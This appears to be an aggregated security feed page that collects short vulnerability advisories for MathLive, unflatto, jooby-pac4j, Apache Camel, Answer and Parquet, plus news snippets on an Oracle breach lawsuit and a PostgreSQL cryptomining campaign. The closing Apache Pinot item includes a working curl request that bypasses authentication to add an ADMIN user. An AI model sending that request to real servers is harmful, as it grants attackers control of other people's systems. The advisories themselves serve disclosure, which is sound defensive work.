#auth

### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-qwj6-q94f-8425. This link is maintained to preserve external references. ### Original Description Cross Site Scripting vulnerability in arnog MathLive Versions v0.103.0 and before (fixed in 0.104.0) allows an attacker to execute arbitrary code via the MathLive function.

Oracle faces a class action lawsuit filed in Texas over a cloud data breach exposing sensitive data of 6M+ users; plaintiff alleges negligence and delays.

Exposed PostgreSQL instances are the target of an ongoing campaign designed to gain unauthorized access and deploy cryptocurrency miners. Cloud security firm Wiz said the activity is a variant of an intrusion set that was first flagged by Aqua Security in August 2024 that involved the use of a malware strain dubbed PG_MEM. The campaign has been attributed to a threat actor Wiz tracks as

In the competitive world where artificial intelligence (AI) has made it easy to use technology, companies are constantly…

### Impact alizeait unflatto <= 1.0.2 was discovered to contain a prototype pollution via the method exports.unflatto at /dist/index.js. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties. ### Patches The problem has been patched in 1.0.3 ### References https://github.com/advisories/GHSA-799q-f2px-wx8c

### Impact Versions after 2.x and before 3.x of io.jooby:jooby-pac4j can cause deserialization of untrusted data ### Patches - 2.17.0 (2.x) - 3.7.0 (3.x) ### Workarounds - Not using io.jooby:jooby-pac4j until it gets patches. - Check what values you put/save on session ### References Version 2.x: https://github.com/jooby-project/jooby/blob/v2.x/modules/jooby-pac4j/src/main/java/io/jooby/internal/pac4j/SessionStoreImpl.java#L39-L45 Version 3.x: https://github.com/jooby-project/jooby/blob/v3.6.1/modules/jooby-pac4j/src/main/java/io/jooby/internal/pac4j/SessionStoreImpl.java#L77-L84 ### Cause In module pac4j io.jooby.internal.pac4j.SessionStoreImpl#get , it is used to handle sessions , and trying to get key value. In strToObject function ,it's trying to deserialize value when value starts with "b64~" , which might cause deserialization of untrusted data. [modules/jooby-pac4j/src/main/java/io/jooby/internal/pac4j/SessionStoreImpl.java](https://github.com/jooby-project/jooby/blo...

Bypass/Injection vulnerability in Apache Camel in Camel-Undertow component under particular conditions. This issue affects Apache Camel: from 4.10.0 before 4.10.3, from 4.8.0 before 4.8.6. Users are recommended to upgrade to version 4.10.3 for 4.10.x LTS and 4.8.6 for 4.8.x LTS. Camel undertow component is vulnerable to Camel message header injection, in particular the custom header filter strategy used by the component only filter the "out" direction, while it doesn't filter the "in" direction. This allows an attacker to include Camel specific headers that for some Camel components can alter the behaviour such as the camel-bean component, or the camel-exec component.

Private Data Structure Returned From A Public Method vulnerability in Apache Answer. This issue affects Apache Answer: through 1.4.2. If a user uses an externally referenced image, when a user accesses this image, the provider of the image may obtain private information about the ip address of that accessing user. Users are recommended to upgrade to version 1.4.5, which fixes the issue. In the new version, administrators can set whether external content can be displayed.

Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code Users are recommended to upgrade to version 1.15.1, which fixes the issue.

Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.